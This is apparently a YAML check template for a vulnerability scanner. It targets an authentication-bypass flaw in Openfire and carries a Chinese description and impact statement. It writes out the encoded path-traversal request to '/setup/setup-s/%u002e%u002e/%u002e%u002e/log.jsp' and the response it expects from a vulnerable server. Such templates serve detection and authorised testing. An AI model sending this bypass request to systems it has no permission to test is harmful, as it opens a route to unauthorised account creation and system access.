30 lines
763 B
YAML
30 lines
763 B
YAML
|
keyword: openfire
|
||
|
name: Openfire身份认证绕过
|
||
|
description: |
|
||
|
Openfire 服务器存在身份认证绕过漏洞,攻击者通过构造特定 URL 链接以 GET 请求发送至漏洞服务器中,即可创建任意账户,进而获取系统权限。
|
||
|
requests:
|
||
|
path: "/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp"
|
||
|
method: GET
|
||
|
headers:
|
||
|
User-agent:
|
||
|
Content-length:
|
||
|
Accept:
|
||
|
Content-type:
|
||
|
Accept-Encoding:
|
||
|
Cookie:
|
||
|
Referer:
|
||
|
X-Forwarded-For:
|
||
|
body-raw: |-
|
||
|
|
||
|
response:
|
||
|
status-code: 200
|
||
|
body: "line"
|
||
|
headers:
|
||
|
Server:
|
||
|
Content-type:
|
||
|
Content-length:
|
||
|
Date:
|
||
|
Connection:
|
||
|
impact: |
|
||
|
攻击者可以通过利用此漏洞在 Openfire 服务器上创建任意账户,并获取系统权限。
|